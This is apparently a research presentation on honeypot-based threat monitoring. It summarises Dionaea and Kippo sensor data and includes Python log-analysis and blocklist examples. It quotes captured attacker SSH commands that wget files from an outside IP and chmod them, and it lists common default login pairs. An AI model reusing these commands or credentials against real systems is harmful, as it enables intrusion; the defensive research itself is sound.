Study of Internet Threats and Attacks Methods Using Honeypots and Honeynets
Tomas Sochor & Matej Zuzcak
University of Ostrava, Department of Informatics and Computers
Presentation Contents
1. Introduction.
2. Honeypot and honeynet classification.
3. Research methods.
4. Sensors used for the study.
5. Honeynet topology.
6. Results:
   – Linux SSH shell emulation (Kippo),
   – Windows emulation (Dionaea).
7. Comparison of sensor attractiveness.
8. Conclusions.
Honeypot and Honeynet Classification
− Honeypot (L. Spitzner, 2003): a security resource whose value lies in being probed, attacked or compromised, i.e. a "lure" for attackers:
  – it attracts attacks towards itself,
  – the captured attacks can be analyzed in detail.
− Basic classification by activity:
  – passive (server honeypots),
  – active (client honeypots).
− Basic classification by level of interaction:
  – low/(medium)-interaction honeypots,
  – high-interaction honeypots.
Honeypot and Honeynet Classification
• According to the production view (the important classification):
  – Production honeypots
    • Shadow honeypots
  – Research honeypots
Honeypot Purpose
• Obtaining information about:
  – the most widespread threats or attacks in our area,
  – new threats and attacks.
• Why is it important?
  – To improve detection and defence ("keep up with the attackers...").
  – To compare the attractiveness of different networks for attackers and to follow current trends.
  – To detect potential new threats.
Honeynet Classification
• Honeynet = (logical) network of several honeypots:
  – either connected to a single physical network,
  – or spread over multiple networks interconnected through the Internet.
Honeypot Projects - Current State
− Honeypot results are seldom published.
− Published data:
  − few details,
  − often outdated,
  − further, more detailed analysis is therefore not possible.
− Numerous closed-community honeypots:
  − data can be shared only among members.
− National and European institutions (CERT and CSIRT teams, ENISA):
  − research and data collection are run by private bodies,
  − mostly in non-public mode (e.g. armed forces).
− Only a few projects are publicly available:
  − most of them are not focused primarily on honeypots,
  − some projects publish elementary statistical outputs, for example DenyHosts and DShield.org.
Study Research Methods
− Low-interaction honeynet:
  − Windows honeypot sensor – Dionaea:
    − emulation of specific protocols and vulnerabilities,
    − primary goal is to capture and analyze binary files (malware).
  − Linux honeypot sensor – Kippo:
    − emulation of an SSH shell (TCP port 22),
    − primary goal is to monitor the activities of the attacker who is remotely connected to the system.
Distribution and Implementation of Sensors
− Low-interaction sensors:
  − Dionaea: OSU (ČR), VPS Prague (ČR), Kysucké Nové Mesto (SR),
  − Kippo: VPS Prague (ČR).
− Modifications of the Dionaea and Kippo implementations:
  − malware identification is propagated into a central database.
− Evaluating the data:
  − analysis of the data,
  − comparison of results among sensors.
− Sensors' attractiveness in academic networks is low, almost insufficient.
Dionaea honeypot sensor – OSU, CESNET
[Charts: number of all connections towards the honeypot per day; files downloaded per day; period 1.11.2013 – 1.3.2014]
Dionaea honeypot sensor – VPS Praha
[Charts: number of all connections towards the honeypot per day; files downloaded per day; period 1.11.2013 – 1.3.2014]
Dionaea honeypot sensor – SR, SANET
[Charts: number of all connections towards the honeypot per day; files downloaded per day; period 1.11.2013 – 1.3.2014]
[Statistics printed on the charts (daily mean x̄, sample standard deviation s); the extraction does not preserve which chart each belongs to: x̄ = 2125.11; x̄ = 789.62; x̄ = 241.90; x̄ = 0.15; and one chart reporting both x̄ and s with the values 69064.48 and 28635.48 (their assignment to x̄ and s is not recoverable)]
Dionaea – Windows attacks analysis
− Number of unique samples (by MD5): 1440.
− Number of unknown samples (according to Virustotal.com): 16.
− Conficker network worm:
  − the most frequently spread threat captured: 99.99933 % of all malware,
  − remote code execution via a buffer overflow in the Windows RPC Server service (the MS08-067 vulnerability, exploited over TCP port 445),
  − originated Nov. 2008!
  − lots of new polymorphic variants.

Operating system of connecting hosts   Number of connections
Windows                                9 123 795
Unknown                                  114 928
Linux                                      4 736
SunOS                                        454

Local port   Number of accepted connections
445          9 141 640
80              26 604
1433            15 645
3306            11 552
21               7 300

Captured Conficker variants (by detection name): Win32/Conficker.AA, Win32/Conficker.AE, Win32/Conficker.AL, Win32/Conficker.X.
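The port table and the sample counts above are the kind of aggregation a sensor's SQLite log lends itself to. What follows is an added example, not code from the study or from the Dionaea project: it builds an in-memory SQLite database whose two tables only loosely mirror Dionaea's logsql.sqlite layout (the column set and the service names are assumptions of this example, every row is constructed, and the addresses and MD5 values are placeholders), then computes accepted connections per local port, connections and downloads per day with x̄ and s, the number of unique samples by MD5, and each sample's share of all downloads, which is how a figure such as the 99.99933 % Conficker share is obtained.

```python
"""Summarise a Dionaea logsql-style SQLite database the way the Windows sensor slides do:
connections per local port, connections and downloads per day (mean, standard deviation),
unique samples by MD5 and each sample's share of all downloads.
Added example, not code from the original study: the two tables only loosely mirror
Dionaea's logsql.sqlite (connections, downloads); the column set is this example's
assumption and every row is constructed (documentation-range addresses, made-up hashes).
"""
import sqlite3
import statistics
from datetime import datetime, timezone

SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_timestamp INTEGER NOT NULL,  -- unix epoch, UTC
    connection_protocol TEXT NOT NULL, local_port INTEGER NOT NULL, remote_host TEXT NOT NULL);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY, connection INTEGER NOT NULL REFERENCES connections(connection),
    download_url TEXT NOT NULL, download_md5_hash TEXT NOT NULL);
"""


def _ts(s: str) -> int:
    """'YYYY-MM-DD HH:MM' (UTC) -> unix epoch, so SQLite's date() groups by UTC day."""
    return int(datetime.strptime(s, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc).timestamp())


# Constructed rows: (id, timestamp, emulated service, local port, remote host)
SAMPLE_CONNECTIONS = [
    (1, _ts("2013-11-01 00:10"), "smbd",   445,  "203.0.113.10"),
    (2, _ts("2013-11-01 01:22"), "smbd",   445,  "203.0.113.10"),
    (3, _ts("2013-11-01 03:05"), "httpd",  80,   "198.51.100.7"),
    (4, _ts("2013-11-01 07:44"), "mssqld", 1433, "198.51.100.7"),
    (5, _ts("2013-11-02 02:15"), "smbd",   445,  "203.0.113.11"),
    (6, _ts("2013-11-02 09:30"), "smbd",   445,  "203.0.113.12"),
    (7, _ts("2013-11-02 18:01"), "mysqld", 3306, "192.0.2.44"),
    (8, _ts("2013-11-03 04:50"), "smbd",   445,  "203.0.113.10"),
    (9, _ts("2013-11-03 05:12"), "ftpd",   21,   "192.0.2.9"),
]
# Constructed rows: (id, connection id, URL the attacker pointed us at, MD5 of the fetched file)
HASH_A, HASH_B = "aa" * 16, "bb" * 16
SAMPLE_DOWNLOADS = [
    (1, 1, "http://203.0.113.10:8080/x", HASH_A),
    (2, 2, "http://203.0.113.10:8080/x", HASH_A),
    (3, 5, "http://203.0.113.11:6677/y", HASH_B),
    (4, 8, "http://203.0.113.10:8080/x", HASH_A),
]


def load_sample_db() -> sqlite3.Connection:
    """In-memory copy of the constructed data; on a sensor you would open its own SQLite file."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO connections VALUES (?, ?, ?, ?, ?)", SAMPLE_CONNECTIONS)
    db.executemany("INSERT INTO downloads VALUES (?, ?, ?, ?)", SAMPLE_DOWNLOADS)
    return db


def connections_per_port(db):
    """Accepted connections per local port, most attacked port first (ties by port number)."""
    return db.execute(
        "SELECT local_port, COUNT(*) FROM connections GROUP BY local_port ORDER BY 2 DESC, 1"
    ).fetchall()


def connections_per_day(db):
    """Connections per UTC day as a date-ordered list of (YYYY-MM-DD, count)."""
    return db.execute(
        "SELECT date(connection_timestamp, 'unixepoch') AS d, COUNT(*) "
        "FROM connections GROUP BY d ORDER BY d"
    ).fetchall()


def downloads_per_day(db):
    """Downloaded files per UTC day; a download row has no time of its own, so join its connection."""
    return db.execute(
        "SELECT date(c.connection_timestamp, 'unixepoch') AS d, COUNT(*) "
        "FROM downloads dl JOIN connections c ON c.connection = dl.connection "
        "GROUP BY d ORDER BY d"
    ).fetchall()


def mean_sd(daily):
    """Daily mean x̄ and sample standard deviation s, the two figures printed on the slide charts."""
    counts = [n for _, n in daily]
    if not counts:
        return 0.0, 0.0
    sd = statistics.stdev(counts) if len(counts) > 1 else 0.0
    return float(statistics.mean(counts)), float(sd)


def unique_samples(db) -> int:
    """Distinct binaries captured, identified by MD5 as in the study."""
    return db.execute("SELECT COUNT(DISTINCT download_md5_hash) FROM downloads").fetchone()[0]


def sample_shares(db):
    """(md5, downloads, share of all downloads) per sample, most frequent first."""
    rows = db.execute(
        "SELECT download_md5_hash, COUNT(*) FROM downloads GROUP BY 1 ORDER BY 2 DESC, 1"
    ).fetchall()
    total = sum(n for _, n in rows)
    return [(h, n, n / total) for h, n in rows]


if __name__ == "__main__":
    db = load_sample_db()
    print("per port:", connections_per_port(db))
    print("connections/day:", connections_per_day(db), "x, s =", mean_sd(connections_per_day(db)))
    print("downloads/day:", downloads_per_day(db))
    print("unique samples:", unique_samples(db))
    for h, n, share in sample_shares(db):
        print(f"{h} {n:>4} {share:.5%}")
```

On a real sensor, open the sensor's own SQLite file instead of the in-memory copy and check its column names against the queries first. The date() grouping is in UTC, so align it with each sensor's clock before comparing daily means across sites, and note that a per-download MD5 count is a share of fetches, not of distinct families; one polymorphic worm can still account for nearly all of it, as it did here.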
Kippo – Linux attack statistics
[Charts: number of attempts to connect to the SSH shell per day; number of successful attempts to connect (logins) per day. Each chart prints x̄ and s, but the extraction fused the two numbers: they read "280.636603.793" for attempts and "877.4792.10" for successful logins, and the split between x̄ and s is not recoverable]
Kippo – Linux attacks analysis
[Charts: the 10 IP addresses with the highest number of connections; activity of individual countries by number of connections]
Total number of attempts to connect: 42 061
Number of unique attacker IP addresses: 427
Kippo – Linux attacks analysis
The most common login data:

Name    Password      Count
root    admin           653
root    123456          306
root    Password        119
root    !QAZ@WSX        112
root    -                96
admin   password         91
root    Abc123           89
root    Password123      89
root    p@ssw0rd         86
admin   passw0rd         85
The most common activities in the emulated system (SSH shell input):
pwd
ls
chmod 0775 .TSm
ls -l
chmod 0775 .Mm2
uname
uname -a
exit
wget http://216.99.158.70:8090/.TSm
wget http://216.99.158.70:8090/.Mm2
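The login table and command list above, and the blacklist use the conclusions mention, can all be derived from the sensor's text log. The following is an added example, not code from the study or from the Kippo project. The log lines are constructed (documentation-range IPs, a placeholder download host); their shape follows Kippo's text log ("login attempt [user/pass] failed|succeeded", "CMD: ...") but that layout is an assumption here, and the ipset set name ssh-bruteforce is made up. It counts attempts and successful logins per day, the most common username/password pairs and shell inputs, pulls download URLs out of the commands as indicators, and lists the noisiest sources as ipset add lines.

```python
"""Summarise Kippo-style SSH honeypot logs the way the Linux sensor slides do: attempts and
successful logins per day, most common user/password pairs, most common shell input,
download URLs as indicators, and a blocklist of the noisiest sources.
Added example, not code from the original study. The lines below are constructed; their
shape follows Kippo's text log but that layout is an assumption, the IPs are from the
documentation ranges and the download host is a placeholder.
"""
import re
import statistics
from collections import Counter
from dataclasses import dataclass

SAMPLE_LOG = """\
2013-11-01 10:00:01+0100 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/admin] failed
2013-11-01 10:00:03+0100 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/123456] succeeded
2013-11-01 10:00:07+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: uname -a
2013-11-01 10:00:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: wget http://203.0.113.99:8090/.TSm
2013-11-01 10:00:11+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: chmod 0775 .TSm
2013-11-02 02:14:30+0100 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [root/admin] failed
2013-11-02 02:14:33+0100 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [admin/password] failed
2013-11-02 19:40:02+0100 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.10] login attempt [root/admin] failed
2013-11-03 04:01:55+0100 [SSHService ssh-userauth on HoneyPotTransport,4,192.0.2.44] login attempt [root/!QAZ@WSX] failed
2013-11-03 04:01:58+0100 [SSHService ssh-userauth on HoneyPotTransport,4,192.0.2.44] login attempt [root/123456] succeeded
2013-11-03 04:02:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,192.0.2.44] CMD: uname -a
2013-11-03 04:02:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,192.0.2.44] CMD: pwd
"""

LINE = re.compile(r"^(?P<date>\d{4}-\d{2}-\d{2}) \S+ \[(?P<ctx>[^\]]*)\] (?P<msg>.*)$")
SRC = re.compile(r"HoneyPotTransport,\d+,(?P<ip>\S+)$")        # peer address sits last in the context
LOGIN = re.compile(r"^login attempt \[(?P<user>[^/]*)/(?P<pw>.*)\] (?P<result>failed|succeeded)$")
CMD = re.compile(r"^CMD: (?P<cmd>.*)$")
URL = re.compile(r"https?://\S+")


@dataclass
class Event:
    date: str
    ip: str
    kind: str            # "login" or "cmd"
    user: str = ""
    password: str = ""
    ok: bool = False     # login succeeded
    cmd: str = ""


def parse(text: str):
    """Turn log text into login and command events; lines of any other shape are skipped, not fatal."""
    events = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        src = SRC.search(m["ctx"])
        ip = src["ip"] if src else "?"
        if lm := LOGIN.match(m["msg"]):
            events.append(Event(m["date"], ip, "login", lm["user"], lm["pw"], lm["result"] == "succeeded"))
        elif cm := CMD.match(m["msg"]):
            events.append(Event(m["date"], ip, "cmd", cmd=cm["cmd"].strip()))
    return events


def per_day(events, successful_only=False):
    """Login attempts per day (or only successful logins), as a date-ordered list of (date, count)."""
    return sorted(Counter(e.date for e in events if e.kind == "login" and (e.ok or not successful_only)).items())


def mean_sd(daily):
    """Daily mean x̄ and sample standard deviation s, as printed on the slide charts."""
    counts = [n for _, n in daily]
    if not counts:
        return 0.0, 0.0
    return float(statistics.mean(counts)), float(statistics.stdev(counts) if len(counts) > 1 else 0.0)


def top_credentials(events, n=10):
    """Most tried (username, password) pairs, the slide's login table."""
    return Counter((e.user, e.password) for e in events if e.kind == "login").most_common(n)


def top_commands(events, n=10):
    """Most common shell input after a successful login."""
    return Counter(e.cmd for e in events if e.kind == "cmd").most_common(n)


def download_urls(events):
    """URLs the intruder fetched into the emulated shell (wget/curl), usable as indicators."""
    return sorted({u for e in events if e.kind == "cmd" for u in URL.findall(e.cmd)})


def blocklist(events, min_attempts):
    """Sources with at least min_attempts login attempts, as 'ipset add' lines for a set
    named ssh-bruteforce (the set name is this example's assumption)."""
    per_ip = Counter(e.ip for e in events if e.kind == "login")
    return [f"add ssh-bruteforce {ip}" for ip, n in sorted(per_ip.items()) if n >= min_attempts]


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("attempts/day:", per_day(ev), "x, s =", mean_sd(per_day(ev)))
    print("logins/day:", per_day(ev, successful_only=True))
    print("top credentials:", top_credentials(ev, 3))
    print("top commands:", top_commands(ev, 3))
    print("download URLs:", download_urls(ev))
    print("\n".join(blocklist(ev, 3)))
```

A blocklist built this way is only as good as its threshold: a single failed login is noise, while three attempts from one source in a day on a host that offers nothing is already a scanner. Publish the resulting set to firewalls or an IPS with an expiry, since attacker addresses on the top-10 chart rotate, and keep the extracted URLs with the sample hashes so the downloaded file can be tied back to the session that fetched it.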
Low-interaction honeynet - conclusions
− Comparison with other studies is difficult.
− Results comparison:
  − in rough accordance with CZ-NIC and CERT-PL.
− The attacked population shows an indifferent approach to installing security updates (a worm from 2008 still dominates the captures).
− Elementary security features and habits are missing (trivial, default SSH passwords still succeed).
− A detailed statistical overview of current trends in security threats is obtained.
− Potential detection of new threats.
− The obtained data can be used for updating and disseminating blacklists for firewalls / IPS systems.
Honeypots and IPv6 protocol
– IPv6 honeypots connected to the Internet are still ineffective:
  − the IPv6 address range is so huge that blind scanning is pointless, so a passive honeypot is rarely found,
  − the best way to attract traffic is to advertise the honeypot, e.g. through domains in the form ipv6.xxx.xx.
– Honeypot tested in an experimental IPv6 LAN:
  − could be useful for a "dormant" IPv6 network.
– Currently IPv6 is supported directly only by the Dionaea honeypot implementation.
– IPv6 support in Kippo is probably possible with an external patch.
Conclusion and further research
− Honeypots and honeynets are needed:
  − results indicate the continuous occurrence of older attacks,
  − they provide an overview of current trends, the possibility of detecting new attacks, and material for further research with the obtained data.
− Future research:
  − at present we focus mainly on high-interaction honeypots,
  − we are planning research with SCADA honeypots,
  − we are expanding our research network of low-interaction honeypots (low-interaction honeynet) to obtain more relevant data,
  − we also want to do deeper research on local networks and research with client honeypots in the future.
Acknowledgments
• For provided hardware and connection:
  – University of Ostrava, Information Technology Centre
  – Spojena skola v Kysuckom Novom Meste, SK
• For expert consulting:
  – The Honeynet Project, Czech Chapter
  – CZ-NIC